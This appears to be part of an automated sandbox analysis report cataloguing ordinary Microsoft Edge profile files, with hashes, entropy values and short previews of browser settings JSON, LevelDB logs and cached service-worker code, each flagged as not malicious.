                                                                                                                                                                                                                                                                                                        SHA-256:842EAC6D68A227A95079D215C25823CE44354DFC929471AB586AD1377B7766B8
                                                                                                                                                                                                                                                                                                        SHA-512:AE745B953E25D7416356F8F8801285B7E3737147B34C5BA2E43DDB4BFC65DE147BABAF24D3393222C3ABD9873597F82F515161F5514C0834282D524A0A4C5322
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.3785207723930382
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9W7:uIEumQv8m1ccnvS66YlGFh5lQpaw1a
                                                                                                                                                                                                                                                                                                        MD5:FFCA0889292D29C307F62364046E96EF
                                                                                                                                                                                                                                                                                                        SHA1:85BADAE632576AF1A593D53D9712BE4961144210
                                                                                                                                                                                                                                                                                                        SHA-256:E079B07304EC84FE832F68C2A2352B0126F1FB7165E5713CA7BB46058ED511B4
                                                                                                                                                                                                                                                                                                        SHA-512:4EA18AE4B76B6A509A52913CE92FE04E03046D01C66D30AEEBAB3821035D57A45CE89BA201A6DEACA8E051AB528C253DBC01FE50BFD8D017B0BC8C66C66ABC80
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                                                                                                        MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                                                                                                        SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                                                                                                        SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                                                                                                        SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9756
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108335505712741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXkdpTsvVaFvrE9kJcW8ObV+Fh/QAsU5PCYJ:stXQTsvVCD5bG1QKd
                                                                                                                                                                                                                                                                                                        MD5:7966B4938865BBADF89F5840E6D8A0A8
                                                                                                                                                                                                                                                                                                        SHA1:C4A33ADF1A37A56CA7ABC7FE93B9456F75FFBE61
                                                                                                                                                                                                                                                                                                        SHA-256:2B1263B97D8721D6CDD31345CC48C5B837DAFD5075555A3C876F9CF49662DFC5
                                                                                                                                                                                                                                                                                                        SHA-512:27F40F81F1755085720EFA1D8B6354AB89CC9CF844DF0CD44E4D5BCDA8887DD2F3F1D583ECB715D420336DF97F4145BB5A60A64107586F278E2D6D32EECF796D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.55847994360738
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQzzCVWwL7pLGLht4W5wSgf4ql8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPsEIVq7pf:YQ2VDdcht4WaSgfzlu1jalbIa3t6R
                                                                                                                                                                                                                                                                                                        MD5:4A013F77E04FA27E6BD639C5A84DCA4E
                                                                                                                                                                                                                                                                                                        SHA1:EB6F940E41571A0B8A1884B1DC827FEDD830A807
                                                                                                                                                                                                                                                                                                        SHA-256:404623AA8E423F8042FA847E56264AE217BB7C7A4A5AD757799EE51809C2D19D
                                                                                                                                                                                                                                                                                                        SHA-512:76EE460D7AFE2B7917BCA66987300F487BCC620B348E1A88B3B22CE6FE3E93318C1843E30CFAE300E220DE236F720B3853C0168C9C6257ADCFF36D5AEC9D9DBD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                        MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                        SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                        SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                        SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):303
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.145374201803489
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NV01N723oH+TcwtE/a252KLlbVNyq2PN723oH+TcwtE/a2ZIFUv:IaYeb8xL0vVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                        MD5:781A59B23EF846E94B1D537EA7A26F83
                                                                                                                                                                                                                                                                                                        SHA1:E2D6D2DD400FECD2DD70CE4CD2B71F623A8471D0
                                                                                                                                                                                                                                                                                                        SHA-256:CC3EE059BCF185AB2082605062D1C90E185D6C2C5D4732E84E210961E2ECED78
                                                                                                                                                                                                                                                                                                        SHA-512:3484F45E7A5A93C5571FA4ECA18EEA84F7FB09C158CDCF65DD3C6E604DD76205CFC114D827689E16539FACD1F228D8641FDD961F7FEE4AD06CF0EA03C11BE98B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:35.247 1bc0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/24-13:28:35.275 1bc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):114579
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.580500875085219
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekUZuOf:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d6
                                                                                                                                                                                                                                                                                                        MD5:61116C36128E2536C658497483C9C4F0
                                                                                                                                                                                                                                                                                                        SHA1:AD4E6CFD528511E559BB30825CBB44CA69398D10
                                                                                                                                                                                                                                                                                                        SHA-256:4AA3495C461E85E2EFF087080B5BDF26293AC0E086C52C3E69A878B1EC84EA20
                                                                                                                                                                                                                                                                                                        SHA-512:C32ECE3CF7755DE56186FE6180EFB59A511499EDBF6D21F4FA9D496A9F42DC73BF391AA1CF7153A25BB79064C9783DB5DB7B3643C9C1DCCC1713E0495C801A78
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):189113
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.3872538931872525
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:+OEvMsWmOJX2wcN1Jim4LL/wFToXLsvE7wRyvfzrtU0FLR:MI2wc5iZL/0yj7Y8LR
                                                                                                                                                                                                                                                                                                        MD5:14FC53C6D7E3FAFA2FB52A9BF8036277
                                                                                                                                                                                                                                                                                                        SHA1:1F265B5BE417464752E3940E516080A6F1C46CDD
                                                                                                                                                                                                                                                                                                        SHA-256:E5E90C163F9EACB85D5D153EF86F4DCFBA514AF2C01BB9056F9B631271C9679D
                                                                                                                                                                                                                                                                                                        SHA-512:BD8C11159726B7568BA866AE485D486AA9C3101EE2F345B6C8DE9AB8D72DDB2C8805781586BAB85079FB25ABB6D39E080AC8D5EF556B14993519D47510DC623C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0...../...............R.......yT`........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc.A.N....module....Rc>..l....define....RbJm/.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...F...{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5931902015385067
